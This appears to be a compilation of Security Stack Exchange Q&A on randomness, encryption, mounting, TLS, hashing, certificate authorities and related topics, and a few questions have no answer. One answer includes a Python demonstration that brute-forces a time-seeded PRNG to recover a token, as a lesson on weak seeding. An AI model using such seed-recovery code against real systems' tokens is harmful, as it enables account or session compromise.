There is a (common) misconception in this question that there is such a thing as “true” randomness and that this matters for security. In fact, whether “true” randomness exists is a philosophical question (physics gives a partial answer), which is not relevant for security. There are many notions of randomness. What is relevant for security is unpredictability. Security is defined as protecting against adversaries. A value is “random”, for security purposes, if your adversary cannot find or guess it. In the context of security, “true random” is sometimes used to mean a value is based on some physical process that no adversary can reproduce. For example, a coin flip is generally truly random in that sense. But not if the coin is too heavily biased, and not if the adversary can see the result of the coin flip. Performing 128 coin flips in front of a camera will not give you a secure 128-bit random number. (It does give you a value that cannot be predicted in advance, which is good for a few things but not good, for example, as a cryptographic key.) Conversely, a value which is calculated in a deterministic way by a cryptographically secure pseudorandom generator (CSPRNG) is perfectly fine as a random value, as long as adversaries cannot learn the seed or the internal state of the random generator. The fact that only deterministic physical processes were involved other than the generation of the seed, and that the same seed was used to generate other random values, does not compromise the security of the random value (assuming that the CSPRNG was correctly designed and implemented, an assumption that holds for any secure processing). “True” randomness is necessary for security because you have to seed the CSPRNG somehow. You can seed a CSPRNG with the output of a CSPRNG, but ultimately, you have to start somewhere with a non-deterministic or non-sufficiently-precisely-modeled physical process. A random value is only good enough if it's sufficiently unpredictable. If I tell you that I picked my secret key at random between 12729af5a51075a68db9d4b05ce7981a and fc42099f25ee1eb5a8dc1178c35868b8, that's not good for me: I did in fact generate those two values randomly, and you don't know which one it is, but you can still find it in at most two guesses. The measure of unpredictability or unknowability of a value is called entropy (beware that there are many related, but distinct concepts called entropy). A fully known value has an entropy of 0. A value which has equal chances of being one of two known possibilities has an entropy of 1. By telling you that my key is one of these two values, I've reduced its entropy to at most 1 bit, no matter how randomly those two values were generated. An audio file may or may not have a large amount of entropy. At one extreme, if the adversary has the same file, the entropy is 0. If the adversary has a different recording of the same sound, there may be artifacts due to the microphone quality and placement, but audio compression would tend to remove these artifacts. Microphone white noise can be a decent source of entropy, but you should get it directly from the hardware: by the time you get a recording, it's hard to make sure that the noise has been preserved and that the same noise hasn't been copied somewhere else. The problem with rand() functions in the standard library of most programming languages is not that they're pseudorandom, but that they're not cryptographically secure, for two major reasons: The adversary can find the seed.
For example, srand(time()) is mostly predictable (depending on how precisely the adversary knows when your application ran – this has nothing to do with time-of-day being cyclical). And even if the adversary doesn't know the seed, if the seed is a 32-bit number, it's easy for the adversary to try all possible seeds by brute force. If it's a 64-bit number, it's costly but still doable. Outputs are not independent: given enough outputs from rand(), it's possible to calculate other outputs. Secure random generators, such as /dev/urandom or CryptGenRandom, have neither of these flaws: they use a CSPRNG algorithm (which guarantees independent outputs) from a secure seed (which, in modern computers, can be generated from a component in the main CPU).
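To make the first flaw concrete, here is a small sketch in Python (whose random module is a Mersenne Twister rather than C's rand(), but the seeding problem is the same): if the seed is a timestamp, an attacker who roughly knows when the value was generated can simply try every nearby seed.

# Sketch: why seeding a PRNG with the current time is not enough.
# Python's random module stands in for srand()/rand(); secrets is the safe alternative.
import random
import secrets
import time

seed = int(time.time())                  # what naive srand(time())-style seeding amounts to
token = random.Random(seed).getrandbits(64)

# Attacker: knows the value was generated "around now", brute-forces nearby seeds.
now = int(time.time())
for guess in range(now - 3600, now + 1):
    if random.Random(guess).getrandbits(64) == token:
        print("recovered seed:", guess)
        break

# The right tool: an OS-backed CSPRNG, with no seed for the attacker to guess.
safe_token = secrets.token_bytes(16)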
{ "source": [ "https://security.stackexchange.com/questions/258266", "https://security.stackexchange.com", "https://security.stackexchange.com/users/271939/" ] }
258,637
What is this restriction for in terms of safety? And when connecting external drives via USB, the root password is not required. I can't understand the logic. I use the following rule in the fstab to connect the internal drive at runtime: LABEL=disk /media/user/disk ext4 rw,nosuid,nodev,noexec,discard,relatime,user How would such a rule add vulnerability?
Mounting filesystems has multiple very high security risks, and should not be taken lightly. Having said that, there are multiple tools (like udisks and the user option in fstab) that run with elevated privileges and try to mitigate risks while allowing users to mount disks. Most of the mitigations work by carefully controlling mount options. Here is a short (and incomplete) list of possible risks: a maliciously malformed filesystem could cause the system to crash or trigger buffer overrun errors in the kernel (mitigation: run filesystem check first and reject or repair malformed filesystems) a maliciously populated filesystem could include setuid binaries or devices with open permissions that would allow privilege escalation (mitigation: mount with nosuid,nodev and possibly noexec) mount options can allow mounting of existing partitions while forcing file ownership changes via mount options (mitigation: restrict users from supplying mount options) mount can replace existing system directories (mitigation: only allow user triggered mounts on special designated directories) unmounting arbitrary filesystems could cause a denial of service attack (mitigation: only allow user mounted filesystems to be user unmounted) To summarize, mount is a system critical function and its effects can severely impact system integrity and security, so it should only be allowed by non-admin users in extremely restricted conditions.
{ "source": [ "https://security.stackexchange.com/questions/258637", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272464/" ] }
258,780
From the way I understand it, at-rest encryption is used to protect data when it's being stored at a datacenter so that if someone manages to get data they shouldn't have, they don't have anything useful. But regardless of what type of encryption is being used, the key (or some other method) also has to be stored somewhere - readily accessible for decryption. So, wouldn't it be simple for someone to just undo the encryption? Given they already gained access. Am I just not getting how it works or is there some other concept I'm not taking into consideration?
Yes, it's worth it, by far. Computers get stolen. If the hard disk is encrypted, the thief ends up only with hardware, and hardware is cheap to replace. If the disks aren't encrypted, the thief has the hardware and the data. Depending on the kind of data, the company can lose intellectual property, industry secrets, or HR data, and that can translate into huge fines (or dead people, if the data is the real names of CIA operatives). USB devices are easy to forget or to misplace. If they are encrypted, and the key is stored on the computer, there's nothing on the drive that can be read. Full disk encryption indeed keeps the key on the system, but the key is password protected, and the password is not on the system. Bruteforcing the password is possible, but depending on its length, it can take far longer than the data stays interesting (think 1000 years to crack it). High-security systems keep the keys on a TPM or a smartcard. The former has pretty strong protections, and capturing data from inside a TPM is not remotely easy to achieve. And a smartcard usually is not stored with the computer, is usually protected by a PIN, and auto-erases itself in case of a bruteforce attempt. There are LUKS settings (for Linux computers) that don't even keep the encryption header on the disk; instead it resides on a USB drive. In the case of theft, there is nothing to be bruteforced, because the header is on separate hardware, probably carried by the user.
{ "source": [ "https://security.stackexchange.com/questions/258780", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272786/" ] }
258,785
I'm working on a REST API endpoint where we only accept requests from certain domain names. Whitelisting. A dev I'm working with recommended that we return HTTP 400 instead of HTTP 403 if the incoming IP address is not whitelisted. They said it was because we don't want to disclose any unnecessary information. Is this a common security practice? If so, what is the point of the other HTTP error codes (4xx)? Is there ever a scenario where it's safe to return specific error codes?
There is a trade-off between two requirements: what to reveal to help the user and as aid in debugging and what to hide from the user as another layer in defense. Returning 400 "bad request" instead of a more specific error code is definitely misleading since this error code is related to malformed requests. It will confuse attackers but it will also confuse intended users of your system, thus possibly decrease customer satisfaction and increase your support costs. The problems of too generic error messages can be seen with TLS, where one often only gets a generic "handshake failure" which makes it very hard to figure out what the underlying problem is. Returning 403 "forbidden" with a very specific reason like "not on source IP whitelist" might reveal too much information about this layer of protection though. A generic 403 instead just means that there is access control and does not reveal anything about its details. This might be a good trade-off between not revealing too much internals and allowing focused debugging of problems. Apart from that there are specific error codes which trigger actions in clients: 401 and 407 will (in interactive use) lead to prompting for authentication credentials, so they should not be simply replaced with a plain 400 when authentication is requested.
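As a sketch of that trade-off (Flask and the whitelist values are used purely for illustration and are not part of the original API), the endpoint can log the specific reason internally while returning only a generic 403 to the caller:

# Sketch: generic 403 to the client, specific reason in the server logs.
# Flask and the whitelist are illustrative assumptions, not the asker's actual stack.
import logging
from flask import Flask, abort, jsonify, request

app = Flask(__name__)
ALLOWED_IPS = {"203.0.113.10", "203.0.113.11"}   # hypothetical whitelist

@app.route("/api/resource")
def resource():
    ip = request.remote_addr
    if ip not in ALLOWED_IPS:
        logging.warning("rejected %s: not on source IP whitelist", ip)
        abort(403)                               # generic to the caller, specific in the logs
    return jsonify({"status": "ok"})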
{ "source": [ "https://security.stackexchange.com/questions/258785", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272799/" ] }
258,911
Yes, passing data to the script via arguments is visible through ps -ax, /proc/<pid>/cmdline, etc., BUT if someone has already gained access to your account from the outside (e.g. by hacking your browser) he will have no trouble not only looking at ps -ax, but also periodically intercepting /proc/<pid>/fd/0 (one read intercepted, the next skipped, to be less suspicious). But this is nothing, because if an intruder got access to your account, it would not be difficult for him to just run a keylogger (listening to the X11 server) and intercept keystrokes. I am currently writing a script that runs through sudo (root) and accepts sensitive data. When sending the data directly (as arguments) to the script, I can strictly restrict the characters used in the arguments with sudo ( user ALL = (root) NOPASSWD: /bin/program [0-9][0-9a-z][0-9a-z]... ) so that an attacker cannot use special character combinations to bypass the restriction and thus gain root access. When getting data through a pipe (stdin), I will of course also filter the data: #!/bin/sh pass=$(dd if=/dev/stdin bs=1 count=10 2>/dev/null | tr -cd [:alnum:]), but I consider simple argument restrictions through sudo safer (there will also be additional checking in the script itself). So is there a fundamental difference between passing through stdin or arguments?
/proc/<pid>/fd/0 can only be read by the process owner and root. /proc/<pid>/cmdline can be read by all users.
{ "source": [ "https://security.stackexchange.com/questions/258911", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272464/" ] }
259,089
I've been researching on virtual machine security and found a lot of articles detailing how an infected VM is isolated (or not) from the host machine. But I couldn't find any answers to the opposite side of the question. If my host is infected, can I safely run some operation inside of a VM? How would that work?
The initial question asks "Will the VM be infected?", which is asking to predict the future, which is not possible for anyone on this site to do. So instead, I will answer "Can the VM be infected?" The reason why you read a lot about VM isolation is because the VM is, in essence, just a process on the host machine, similar to Chrome, VLC or any game you may be playing. A VM process just happens to be a lot more complex, but in essence, the VM is less privileged than your host's operating system. It would be nonsensical if the VM could somehow "overrule" the host's operating system. But this paints a clear picture: The host OS is more privileged than the guest OS. If malware infects the host, then an attacker may be able to run commands with elevated privileges (root on UNIX systems, SYSTEM on Windows, etc.), or even run with kernel privileges. If that is the case, then the VM can be modified and infected at will by an attacker. After all, the VM is just a process, running in the same compromised environment.
{ "source": [ "https://security.stackexchange.com/questions/259089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/273336/" ] }
259,383
Does HTTPS have any unique mechanisms that protect web servers from exploits run by a malicious client (eg. SQL injection, specific browser exploits etc.)? My current understanding is that HTTPS is simply a HTTP session run over a TLS 1.2/1.3 tunnel (ideally), and wouldn't protect against any vulnerabilities of the client/server applications running on either end. Is it correct that TLS only protects against MiTM and that browsers/web servers must be regularly patched to protect against all other exploits?
You are correct; TLS provides no protection at all against malicious clients. You can think of TLS as providing a tunnel between the client and server. What's going through the tunnel is protected against attack from outside the tunnel , but it doesn't control what goes through the tunnel at all. Therefore, it doesn't protect against attacks launched through the tunnel (in either direction).
{ "source": [ "https://security.stackexchange.com/questions/259383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/249225/" ] }
259,408
I'm working with some middleware that requires username/password authentication. The middleware uses MD5 hash for the password. The MD5 hash, of course, is not fit for the purpose of storing passwords. We need to address this. We tried modifying the middleware to use a newer hash but it is a crap system we can't really change easily. However, we can control the web site that sits on top of it, and it's easy to change its code. So one of our developers had this idea: When the user registers, the web site generates its own salt, then hashes the password with SHA-256 before passing it to the middleware. The middleware will then hash the password again using MD5 and its own salt. When the user signs on, the web site retrieves its own salt then attempts to recreate the SHA-256 hash from the password that the user typed in. The web site then passes the SHA-256 hash to the middleware for validation. The middleware retrieves its own salt and attempts to recreate the MD5 hash from the salt and the SHA-256 that was passed in. If they match, the signon attempt is successful. By combining the hashes in this manner, will my site be as secure as if were using the SHA-256 hash alone? Or does double hashing create some kind of vulnerability?
Yes, combining hashes in this fashion will increase the overall security of password storage on the website, mostly by the use of salted SHA-256 hashing. The final MD5 digest has little effect but does nominally improve security. However, the described scheme is not very strong. The main problem is that if an attacker gains access to the hashed passwords and learns this scheme of password protection, they can easily start searching for common passwords and brute forcing the entire set. Because both SHA-256 and MD5 are so cheap to compute, it may be feasible to recover several passwords. SCrypt would be a much better choice than a SHA digest because of its relative cost of computation. (BCrypt would be a good choice too but is infeasible due to the final MD5 preventing verification.) Another simple improvement above what is described would be to perform many (thousands) of SHA-256 (or larger) digests to make it cost-prohibitive to search the space but not unduly expensive (say, a few hundred milliseconds) to verify a single password.
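For reference, a minimal sketch of the scrypt alternative on the website side, using only the Python standard library (the cost parameters are illustrative and should be tuned to your hardware; in the asker's setup the resulting digest would then be handed to the middleware as before):

# Sketch: salted scrypt in place of the single SHA-256 step. Parameters are illustrative.
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return salt, digest

def verify_password(password, salt, expected):
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))   # True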
{ "source": [ "https://security.stackexchange.com/questions/259408", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34115/" ] }
259,427
I was wondering if it is possible for openssl to check the server public key size. Currently, I am connecting to the server using: openssl s_client -connect "ip address":"port" -key client.key -cert client.crt -CAfile myCA.crt -verify 10 -verify_return_error This is on the client side. The server has been set with a weak server key (1024). I was hoping that there is a one-line solution for rejecting the server because of its weak server key.
{ "source": [ "https://security.stackexchange.com/questions/259427", "https://security.stackexchange.com", "https://security.stackexchange.com/users/274015/" ] }
259,903
I asked a question about HTTPS encryption as it relates to developing a web app here . On the face of it that question has now been closed twice for not being focused enough, but if the meta discussion is anything to go by, it's more realistically because of my wrong assumptions about the topic. An exchange in the comments with another user revealed this: There is no such thing as "just encrypted in transit", that's simply a confusion from you. You are confused about how HTTPs works, which is the reason for this question and its many misconceptions. Good luck in the future :) This goes against what I've always assumed, so I did some further research and it seems that at least some people consider HTTPS to be encryption in transit, and consider encryption in transit to be distinct from end-to-end encryption. So which is true? Is encryption in transit a completely different concept to end-to-end encryption, or are they the same thing?
Some definitions: Encryption in transit means that data is encrypted while transiting from one point to another, typically between one client and one server. End-to-end encryption means that data is encrypted while in transit between its original sender and the intended final recipient, typically from one client to another client; the routing servers only see the encrypted data without being able to decrypt it. Encryption at rest is when data is stored encrypted. Depending on the context, this can be on the client, the server, both of them or only one of them. HTTPS (and TLS) only provides encryption in transit. It is not suited for end-to-end encryption. A second layer of encryption on top of HTTPS is usually used to provide end-to-end encryption.
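As a toy illustration of that second layer (the cryptography package and the pre-shared key are assumptions here; real end-to-end schemes negotiate per-recipient keys rather than hard-coding one), the sender encrypts before the data ever enters the HTTPS tunnel:

# Toy sketch: an extra encryption layer on top of HTTPS.
# Assumes the `cryptography` package and a key already shared between the two endpoints.
from cryptography.fernet import Fernet

shared_key = Fernet.generate_key()     # in practice: exchanged out of band, never given to the server
sender = Fernet(shared_key)

ciphertext = sender.encrypt(b"message only the other endpoint can read")
# `ciphertext` is what gets sent over HTTPS; the relaying server only ever sees this blob.

receiver = Fernet(shared_key)
print(receiver.decrypt(ciphertext))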
{ "source": [ "https://security.stackexchange.com/questions/259903", "https://security.stackexchange.com", "https://security.stackexchange.com/users/120534/" ] }
260,116
Let's say that I have a single-page web app written in JavaScript and a server-side API, both changeable by me. The app calculates some values based on user input and POSTs these to the API. The values are based on user input but do not contain user input. For instance it might ask the user to pick A or B based on radio buttons, then send their choice to the server. There is no session, and the user is anonymous. Rule #1 is Never Trust User Input. A malicious user could modify the payload, and change "A" to "C" (not one of the choices). I don't want that to happen. For simple cases there is an obvious solution: validate the input server-side. If it's not "A" or "B", reject it. In a complex app, though, the number of possible permutations could make validation very difficult. The app could digitally sign the calculated payload before sending it, but as the JavaScript is available to the client, a user could obtain both the key and the algorithm. Obfuscation isn't sufficient here. Has anyone come up with any way to prevent this sort of tampering? Time-based keys provided by the server? Web3? Or is there a formal proof that it is impossible (aside from server-side validation against a set of input constraints)?
TL,DR: It's impossible to do so client side. Client side validation is just a client convenience, not useful to really validate anything. You don't want the client to mistype his email, putting an invalid char somewhere, and have to wait the form being submitted, the server parsing it, and sending back an error 5 seconds later, you want the error to show instantly. You validate on the client, but you ignore the client validation entirely and validate again on the server. If the validation is made client-side, the client may submit the request by hand, bypassing all validation. Even if you use hashing, signing, obfuscating or anything else, the result is an HTTP request and the client can intercept it and tamper it. If your use case is what you asked, server validation it's not difficult at all. Have a table with all questions and all valid answers, and check every client answer with the table. On the first invalid answer you stop the processing and send back an empty page. the number of possible permutations could make validation very difficult. You have to choose between server-side (from trivial to very difficult) and client side (not possible at all). I believe the choice is easy.
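A sketch of that table-driven server-side check (the question IDs and choices are made up):

# Sketch: server-side validation against a table of allowed answers.
# Question IDs and choices are made up; reject on the first invalid answer.
VALID_ANSWERS = {
    "q1": {"A", "B"},
    "q2": {"A", "B", "C"},
}

def validate(submission):
    for question, answer in submission.items():
        if question not in VALID_ANSWERS or answer not in VALID_ANSWERS[question]:
            return False      # stop processing on the first invalid answer
    return True

print(validate({"q1": "A", "q2": "C"}))   # True
print(validate({"q1": "C"}))              # False -> "C" is not one of q1's choices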
{ "source": [ "https://security.stackexchange.com/questions/260116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22022/" ] }
260,120
I read this post but I want to know more details. I know that Google uses a Windows function called CryptProtectData to encrypt user passwords on Windows, and that Google only stores the encrypted forms of the passwords in its database and does not know the encryption keys. So now my question is: how does Sync actually work then? I mean, how can I view my passwords on an Android device, for example? To make my question more general, I want to know the workflow of such apps and password managers which claim to preserve privacy while protecting your data and, more interestingly, work on multiple platforms.
{ "source": [ "https://security.stackexchange.com/questions/260120", "https://security.stackexchange.com", "https://security.stackexchange.com/users/248448/" ] }
260,130
When you are working with secret keys, if your code branches unequally it could reveal bits of the secret keys via side channels. So for some algorithms it should branch uniformly independently of the secret key. On C/C++/Rust, you can use assembly to be sure that no compiler optimizations will mess with the branching. However, on Java, the situation is difficult. First of all, it does JIT for desktop, and AOT on Android, so there are 2 possibilities for the code to be optimized in an unpredictable way, as JIT and AOT are always changing and can be different for each device. So, how are side channel attacks that take advantage of branching prevented on Java?
While you can make some attempt towards constant-time code in general purpose JITed languages like Java, you generally run into some problems: The runtime implementation is, generally, intended to be transparent to the code that is running on top of it, and therefore does not provide strong guarantees about timing behaviour or cache side-channels. If you validate that a Java program generates constant-time results when executed under a particular JRE, there is no guarantee that the timing behaviour will remain unchanged on other JREs or after updates are installed. If you validate that a Java program generates constant-time results when running on a particular architecture, there is no guarantee that the timing behaviour will remain unchanged on other architectures. Assumptions made about the behaviour of runtime library calls may be invalidated after updating the runtime library. The JRE/JIT is a very large and complex system that might have unforeseen behaviours in circumstances that were not identified during development and testing of a constant-time implementation written in Java. The result of this is that you can't really use Java to solve the problem, in most cases. You need to solve it in a way that doesn't depend on JIT behaviour. There are three general approaches here: The runtime library contains one or more constant-time platform-native implementations of the functionality. These are specific to the architecture. The runtime library contains an implementation that provides a shim interface between the Java code and some underlying hardware implementation of the functionality (e.g. if you're running Java on an ARM SoC and that processor has a cryptographic coprocessor or HSM). An implementation is written in a different language that allows for constant-time guarantees, which the Java code can then call into using JNI. These approaches allow for the constant-time parts to be made and maintained more easily. One final approach that isn't really relevant in the general case, but does come up in some specific circumstances (e.g. Java smartcards), is the use of a custom runtime and JIT/AOT that provides extra controls and guarantees that allow for these algorithms to be implemented directly in Java, albeit with some extra development overhead and (usually) a much more constrained environment.
{ "source": [ "https://security.stackexchange.com/questions/260130", "https://security.stackexchange.com", "https://security.stackexchange.com/users/158391/" ] }
260,169
Basically the title. For example, how bad is it to store passwords in an Excel sheet protected with a password, instead of storing passwords in Keypass or something else like Zoho Vault? Of course, this sheet would be in a safe place as well: besides the password to open the sheet, an attacker would need the password to access the Google Drive account and a second factor authentication token from Google.
No. At best, password-encrypted Excel sheets are only protected at rest, not while opened. At worst, it's not encrypted and/or an adversary can use one of several documented MS Office password recovery attacks. It is unwise to assume that Excel's protections have anywhere near as much security vetting as any password manager, especially not the better-established ones like Bitwarden and 1Password. In addition to being vetted for secure password storage, actual password managers include an interface that prevents you from seeing all passwords at the same time. They also have tons of extra features, like options to generate secure passwords, the ability to privately determine if a given password was part of a recent breach, and even the ability to wipe your clipboard a minute after you copy a password to it. See also Wikipedia's List of password managers § Features matrix for a better list of what Excel can't offer but plenty of free options do.
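As a small aside on the "generate secure passwords" feature mentioned above, here is a hedged Python sketch of how such a generator can work using the standard secrets module; the length and character set are arbitrary choices for the example, not a claim about how any particular password manager does it.

import secrets
import string

def generate_password(length: int = 20) -> str:
    # secrets draws from a CSPRNG, unlike the random module
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return ''.join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # different every run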
{ "source": [ "https://security.stackexchange.com/questions/260169", "https://security.stackexchange.com", "https://security.stackexchange.com/users/275370/" ] }
260,171
I’m looking for the term (or some platform) for managing password authentication that works this way: the password is constructed from two parts. The first part is static and chosen by the user; the second part is generated by a TOTP system. For example: at 13:00, Jinx's login password is Abc627028, and at 13:01, Jinx's login password is Abc002839. As you can see, the first part is static (for the user Jinx it is always Abc) and the second part is dynamic, sent to Jinx with an expiration time. I don't want a chained flow, for example first authenticating the user with a static password and then (if the static password is correct) sending a TOTP as a second step. I don't know what this is called; it's something like multi-factor authentication, just in one step.
{ "source": [ "https://security.stackexchange.com/questions/260171", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166489/" ] }
260,222
My state has announced that, in case my country is disconnected from the world's CAs, it will be necessary to install its own state certificates. In many forums I have seen claims that in this case, having its own certificate, the state will be able to decrypt all HTTPS traffic. Is this true or not?
Yes, this could enable your state to spy on HTTPS traffic. That's not just an imaginary threat: it happened in the past at a private company, and it was attempted by a state. CAs are a centerpiece of a trust system. Once your browser trusts a CA, in this case a state-controlled CA, it trusts all the certificates signed by it. Now, your state-controlled ISP could use fake but trusted certificates to intercept traffic to any website, like the BBC or Bellingcat for example, and your browser would not stop it because it would look legitimate. HTTPS is meant to prevent such attacks. Trusting a rogue CA completely breaks HTTPS. This more recent answer by jcaron details the process. Note that technically, it's not the rogue CA that decrypts the traffic; it provides the means for interception by other network actors to remain undetected by the browsers.
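If you want to see which CA a connection is actually anchored to, here is a rough Python sketch using the standard ssl module (the hostname and field handling are illustrative assumptions). It prints the issuer of the certificate a server presents; a connection intercepted via a rogue state CA would show that CA as the issuer instead of the expected public one.

import socket
import ssl

def certificate_issuer(hostname: str) -> dict:
    """Return the issuer fields of the certificate the server presents."""
    context = ssl.create_default_context()
    with socket.create_connection((hostname, 443), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    # 'issuer' is a tuple of RDN tuples, e.g. ((('organizationName', '...'),), ...)
    return dict(rdn[0] for rdn in cert['issuer'])

# Example: certificate_issuer('www.bbc.com') should name a well-known public CA;
# under rogue-CA interception it would name the intercepting CA instead.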
{ "source": [ "https://security.stackexchange.com/questions/260222", "https://security.stackexchange.com", "https://security.stackexchange.com/users/249120/" ] }
260,411
Before uploading a photo or image to a forum, I may typically strip the metadata to remove identifying material with exiftool. The thing is, the Linux file system itself seems to leave some metadata on a file:

cardamom@pluto ~ $ ls -la
insgesamt 1156736
drwx------ 145 cardamom cardamom  20480 Mär 16 08:58 .
drwxr-xr-x   9 root     root       4096 Apr 21  2021 ..
-rw-r--r--   1 cardamom cardamom 123624 Mai 24  2018 IMG_20200627_215609.jpg

So I feel tempted to change the user and group of a file as well. Is that a good idea? There is always a user called nobody and a group called nogroup who look like they were almost made for the purpose. Is that everything or is there more metadata that Linux is leaving on its files?
"the linux file system itself seems to leave some metadata on a file"

User, group, etc. are metadata stored in the file system. They are not part of the file itself and thus will not be included when uploading the file in the browser. This can be different with other data transfer methods, though. When copying or moving files between local file systems or remote file systems (NFS, SMB, ...), information like user, group and permissions might be transferred. It might also be included when storing the file in archives: some formats like tar or cpio include permissions as well as user and group IDs or even names.
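A small Python sketch to make the distinction concrete (the filename is taken from the question; the tar behaviour shown is the default of the standard tarfile module): the owner, group and mode come from os.stat, i.e. from the file system, while the bytes you would upload contain only the file's own contents, and an archive format like tar records the file-system metadata again.

import os
import stat
import tarfile

path = 'IMG_20200627_215609.jpg'  # example file from the question

info = os.stat(path)
print('mode: ', stat.filemode(info.st_mode))          # e.g. -rw-r--r--
print('owner:', info.st_uid, 'group:', info.st_gid)   # stored in the file system

# The raw bytes you upload contain none of that (only embedded metadata
# such as EXIF, which exiftool can strip):
with open(path, 'rb') as f:
    data = f.read()

# A tar archive, by contrast, does record owner, group and mode:
with tarfile.open('photo.tar', 'w') as archive:
    archive.add(path)   # the TarInfo entry stores uid, gid, uname, gname, mode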
{ "source": [ "https://security.stackexchange.com/questions/260411", "https://security.stackexchange.com", "https://security.stackexchange.com/users/188449/" ] }
260,536
I saw a news report about now freely available software to make "deepfake" videos. Couldn't videos be internally marked using a private key, so that everyone could verify the originator using a public key? This could be built into browsers so that everyone could see whether something was fake or not. Is it technically possible to mark a video stream throughout with something that can't be spoofed or removed? Then if a video had no mark, we would know it was rubbish.
In theory, yes. Signing a video file with a private key and then publishing the public key is no different than signing some text and then publishing it. But this doesn't really solve the problem. For example, imagine someone filmed a video of me putting on two differently colored socks - which, as we all know, is one of the worst imaginable crimes. The person who shot the video signs it with their private key and publishes it. Now I vehemently deny the legitimacy of the video, saying it was obviously faked and I would never wear differently-colored socks. As it turns out, my claim was correct. Someone shot a video of me wearing socks and then modified the video file to alter the color of one of my socks. They then signed this modified file and published it. As you can see from this example, signing a video really doesn't "verify" that the content of the video is "legitimate" in one way or another. In fact... it makes things even worse. "Deep fakes" are primarily a social problem, meaning that a significant number of people believe that the content of the video is real, despite it not being so. You cannot fix social problems with technology, as that tends to create even more social problems. By adding a simple green checkmark of "Legitimate" to a video, you essentially teach people not to engage their brains and question what they see, and instead create a shortcut of "checkmark = truth". And while some people might not be fooled by it, keep in mind that propaganda doesn't need to work on everyone, just on enough people. In short: The best way to combat deep fakes is to teach people to think critically.
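For completeness, here is what the "signing is technically easy" part looks like in practice, as a hedged Python sketch using the third-party cryptography package (an assumed dependency; the filename is made up). It proves only that a particular key holder signed these exact bytes, which, as argued above, says nothing about whether the footage is truthful.

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

with open('socks.mp4', 'rb') as f:   # hypothetical video file
    video = f.read()

signature = private_key.sign(video)

# Anyone holding the public key can verify that this signer produced these bytes:
try:
    public_key.verify(signature, video)
    print('Signature valid - but that says nothing about whether the scene is real.')
except InvalidSignature:
    print('File was altered after signing, or signed with a different key.')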
{ "source": [ "https://security.stackexchange.com/questions/260536", "https://security.stackexchange.com", "https://security.stackexchange.com/users/275919/" ] }
260,615
I’ve seen multiple sources online that say that unlock patterns are less safe than ‘random’ PINs. I was wondering: how come? From what I can see, they would both be just as secure: you choose different points on a grid, in a certain order, and then it unlocks your phone. They just seem different visually. I also understand that it might be easier to see a pattern through marks on a phone screen, but ignoring that, I don’t understand why anything would change. Is there something I’m getting wrong here?
With a PIN, each digit has 10 possibilities, so the total number of possibilities for N digits is 10^N. With a pattern, each position has at most 8 possibilities (center), or only 5 possibilities (side) if the last one was in the center. Computing the total possibilities is much trickier here, because if you're always returning to the center to get more options then each "return to center" adds no meaningful entropy at all, but it's easy to compute an upper bound: 8^(N/2) * 5^(N/2). In practice a pattern will be worse than that upper bound, though.

For N=4, a PIN has 10,000 possibilities; a pattern has 1,600 (16% as many). For N=6, a PIN has 1,000,000 possibilities; a pattern has 64,000 (6.4% as many). And remember that patterns will in practice be worse than that.

Furthermore, it may be easier to deduce the unlock pattern from viewing screen smudges. Sometimes the screen area where the PIN pad / swipe pattern is displayed doesn't get used after unlocking, and if the screen was clean enough before, you can figure out a lot. With a PIN, you might figure out the set of numbers used (which will drastically lower the possibilities), but you won't know the order. With a pattern, you might literally be able to deduce the entire pattern at a glance (it's possible to tell where a pattern starts and ends, because the fingerprint at the endpoint is less smudged).

EDIT: Thank you to the people in the comments who pointed out that the Android pattern rules are much more complicated than I assumed (my bad; I don't use the pattern unlock on anything). Worth noting that the actual rules permit far fewer patterns than the upper-bound numbers I gave above.

Also, to respond to people pointing out that the maximum number of guesses barely matters anyway: it may be that you're kind of correct, but for a different reason than you think. The default behavior on Android is (or was as of 2013; I don't know if this has changed) that you have unlimited guesses, just with a 30-second pause every five failed attempts. That's enough to fully brute-force the 4-digit PIN space in under a day, although of course in practice the time is vastly shortened by trying the common PINs first. https://www.theverge.com/2013/7/24/4551962/r2b2-3d-printed-open-source-robot-crack-android-pins (I don't know if the robot could attack swipe patterns, but if so, it would take still less time than PINs, for a given length.) The difference between 20 hours max for a four-digit PIN and 90 days max for a six-digit PIN is huge... except of course humans are terrible at randomness.

Obviously, if anti-brute-forcing measures are in place (which they usually are on business-managed devices but not necessarily personal ones), a PIN or pattern only needs to be strong enough to stymie the permitted number of attempts. This is how four-digit PINs on credit and debit cards achieve a tolerable level of security. Also, ideally devices would do something similar to the current password recommendations and disallow PINs (or patterns) that are too commonly used... but in practice, I'm not going to hold my breath for that.
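The arithmetic above is easy to reproduce; here is a short Python sketch using the same upper-bound formula from the answer (which, per the edit, overstates the real number of allowed Android patterns).

def pin_space(n: int) -> int:
    return 10 ** n

def pattern_upper_bound(n: int) -> int:
    # upper bound from the answer: roughly 8 options on "center" steps
    # and 5 on "side" steps, alternating
    return 8 ** (n // 2) * 5 ** (n // 2)

for n in (4, 6):
    pins, patterns = pin_space(n), pattern_upper_bound(n)
    print(f'N={n}: {pins:,} PINs vs at most {patterns:,} patterns '
          f'({patterns / pins:.1%} as many)')

# Output:
# N=4: 10,000 PINs vs at most 1,600 patterns (16.0% as many)
# N=6: 1,000,000 PINs vs at most 64,000 patterns (6.4% as many)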
{ "source": [ "https://security.stackexchange.com/questions/260615", "https://security.stackexchange.com", "https://security.stackexchange.com/users/273116/" ] }